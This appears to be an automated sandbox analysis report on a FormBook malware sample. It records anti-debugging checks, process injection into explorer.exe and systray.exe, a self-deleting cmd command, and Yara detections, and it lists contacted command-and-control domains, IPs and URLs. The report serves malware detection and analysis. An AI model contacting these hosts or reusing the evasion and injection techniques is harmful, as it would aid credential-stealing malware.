Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0040ACC0 LdrLoadDll, 3_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04661074 mov eax, dword ptr fs:[00000030h] 8_2_04661074
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04652073 mov eax, dword ptr fs:[00000030h] 8_2_04652073
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462C450 mov eax, dword ptr fs:[00000030h] 8_2_0462C450
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462C450 mov eax, dword ptr fs:[00000030h] 8_2_0462C450
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B746D mov eax, dword ptr fs:[00000030h] 8_2_045B746D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466740D mov eax, dword ptr fs:[00000030h] 8_2_0466740D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466740D mov eax, dword ptr fs:[00000030h] 8_2_0466740D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466740D mov eax, dword ptr fs:[00000030h] 8_2_0466740D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h] 8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h] 8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h] 8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h] 8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CBC2C mov eax, dword ptr fs:[00000030h] 8_2_045CBC2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04664015 mov eax, dword ptr fs:[00000030h] 8_2_04664015
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04664015 mov eax, dword ptr fs:[00000030h] 8_2_04664015
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04617016 mov eax, dword ptr fs:[00000030h] 8_2_04617016
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04617016 mov eax, dword ptr fs:[00000030h] 8_2_04617016
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04617016 mov eax, dword ptr fs:[00000030h] 8_2_04617016
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_046514FB mov eax, dword ptr fs:[00000030h] 8_2_046514FB
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668CD6 mov eax, dword ptr fs:[00000030h] 8_2_04668CD6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599080 mov eax, dword ptr fs:[00000030h] 8_2_04599080
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CF0BF mov ecx, dword ptr fs:[00000030h] 8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CF0BF mov eax, dword ptr fs:[00000030h] 8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CF0BF mov eax, dword ptr fs:[00000030h] 8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04613884 mov eax, dword ptr fs:[00000030h] 8_2_04613884
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04613884 mov eax, dword ptr fs:[00000030h] 8_2_04613884
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D90AF mov eax, dword ptr fs:[00000030h] 8_2_045D90AF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B7D50 mov eax, dword ptr fs:[00000030h] 8_2_045B7D50
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D3D43 mov eax, dword ptr fs:[00000030h] 8_2_045D3D43
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BB944 mov eax, dword ptr fs:[00000030h] 8_2_045BB944
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BB944 mov eax, dword ptr fs:[00000030h] 8_2_045BB944
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04613540 mov eax, dword ptr fs:[00000030h] 8_2_04613540
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459B171 mov eax, dword ptr fs:[00000030h] 8_2_0459B171
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459B171 mov eax, dword ptr fs:[00000030h] 8_2_0459B171
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BC577 mov eax, dword ptr fs:[00000030h] 8_2_045BC577
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BC577 mov eax, dword ptr fs:[00000030h] 8_2_045BC577
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668D34 mov eax, dword ptr fs:[00000030h] 8_2_04668D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599100 mov eax, dword ptr fs:[00000030h] 8_2_04599100
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599100 mov eax, dword ptr fs:[00000030h] 8_2_04599100
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599100 mov eax, dword ptr fs:[00000030h] 8_2_04599100
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C513A mov eax, dword ptr fs:[00000030h] 8_2_045C513A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C513A mov eax, dword ptr fs:[00000030h] 8_2_045C513A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C4D3B mov eax, dword ptr fs:[00000030h] 8_2_045C4D3B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C4D3B mov eax, dword ptr fs:[00000030h] 8_2_045C4D3B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C4D3B mov eax, dword ptr fs:[00000030h] 8_2_045C4D3B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459AD30 mov eax, dword ptr fs:[00000030h] 8_2_0459AD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h] 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h] 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h] 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h] 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 mov ecx, dword ptr fs:[00000030h] 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04648DF1 mov eax, dword ptr fs:[00000030h] 8_2_04648DF1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459B1E1 mov eax, dword ptr fs:[00000030h] 8_2_0459B1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459B1E1 mov eax, dword ptr fs:[00000030h] 8_2_0459B1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459B1E1 mov eax, dword ptr fs:[00000030h] 8_2_0459B1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CA185 mov eax, dword ptr fs:[00000030h] 8_2_045CA185
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BC182 mov eax, dword ptr fs:[00000030h] 8_2_045BC182
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C35A1 mov eax, dword ptr fs:[00000030h] 8_2_045C35A1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464B260 mov eax, dword ptr fs:[00000030h] 8_2_0464B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464B260 mov eax, dword ptr fs:[00000030h] 8_2_0464B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h] 8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D927A mov eax, dword ptr fs:[00000030h] 8_2_045D927A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464FE3F mov eax, dword ptr fs:[00000030h] 8_2_0464FE3F
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C36CC mov eax, dword ptr fs:[00000030h] 8_2_045C36CC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0464FEC0 mov eax, dword ptr fs:[00000030h] 8_2_0464FEC0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668ED6 mov eax, dword ptr fs:[00000030h] 8_2_04668ED6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C16E0 mov ecx, dword ptr fs:[00000030h] 8_2_045C16E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h] 8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h] 8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h] 8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_046146A7 mov eax, dword ptr fs:[00000030h] 8_2_046146A7
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CD294 mov eax, dword ptr fs:[00000030h] 8_2_045CD294
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CD294 mov eax, dword ptr fs:[00000030h] 8_2_045CD294
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462FE87 mov eax, dword ptr fs:[00000030h] 8_2_0462FE87
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h] 8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668F6A mov eax, dword ptr fs:[00000030h] 8_2_04668F6A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AEF40 mov eax, dword ptr fs:[00000030h] 8_2_045AEF40
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668B58 mov eax, dword ptr fs:[00000030h] 8_2_04668B58
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466070D mov eax, dword ptr fs:[00000030h] 8_2_0466070D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466070D mov eax, dword ptr fs:[00000030h] 8_2_0466070D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CE730 mov eax, dword ptr fs:[00000030h] 8_2_045CE730
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462FF10 mov eax, dword ptr fs:[00000030h] 8_2_0462FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462FF10 mov eax, dword ptr fs:[00000030h] 8_2_0462FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04594F2E mov eax, dword ptr fs:[00000030h] 8_2_04594F2E
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04594F2E mov eax, dword ptr fs:[00000030h] 8_2_04594F2E
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0465131B mov eax, dword ptr fs:[00000030h] 8_2_0465131B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04665BA5 mov eax, dword ptr fs:[00000030h] 8_2_04665BA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0465138A mov eax, dword ptr fs:[00000030h] 8_2_0465138A
Enables debug privileges
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.secureproductsolutions.net
Source: C:\Windows\explorer.exe Network Connect: 75.119.206.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.americacivics.com
Source: C:\Windows\explorer.exe Domain query: www.vstarfireworks.com
Source: C:\Windows\explorer.exe Network Connect: 43.249.29.43 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.186.238.101 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.dcsdeliveryaz.website
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Memory written: C:\Users\user\Desktop\ox87DNNM8d.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3472 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe' Jump to behavior
Source: explorer.exe, 00000004.00000000.250657770.0000000005EA0000.00000004.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000004.00000000.237331727.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Users\user\Desktop\ox87DNNM8d.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 411767 Sample: ox87DNNM8d.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 5 other signatures 2->42 10 ox87DNNM8d.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\ox87DNNM8d.exe.log, ASCII 10->28 dropped 52 Tries to detect virtualization through RDTSC time measurements 10->52 54 Injects a PE file into a foreign processes 10->54 14 ox87DNNM8d.exe 10->14         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 t181.deegeechina.com 43.249.29.43, 49730, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK Hong Kong 17->30 32 www.dcsdeliveryaz.website 75.119.206.89, 49720, 80 DREAMHOST-ASUS United States 17->32 34 3 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 systray.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
35.186.238.101
 www.americacivics.com United States
15169 GOOGLEUS false
75.119.206.89
 www.dcsdeliveryaz.website United States
26347 DREAMHOST-ASUS true
43.249.29.43
 t181.deegeechina.com Hong Kong
133115 HKKFGL-AS-APHKKwaifongGroupLimitedHK true

Contacted Domains

Name IP Active
www.americacivics.com 35.186.238.101 true
t181.deegeechina.com 43.249.29.43 true
www.dcsdeliveryaz.website 75.119.206.89 true
www.secureproductsolutions.net unknown unknown
www.vstarfireworks.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.vstarfireworks.com/sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da true
  • Avira URL Cloud: safe
 unknown
http://www.americacivics.com/sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE false
  • Avira URL Cloud: safe
 unknown
www.panda810.com/sve/ true
  • Avira URL Cloud: safe
 low
http://www.dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da true
  • Avira URL Cloud: safe
 unknown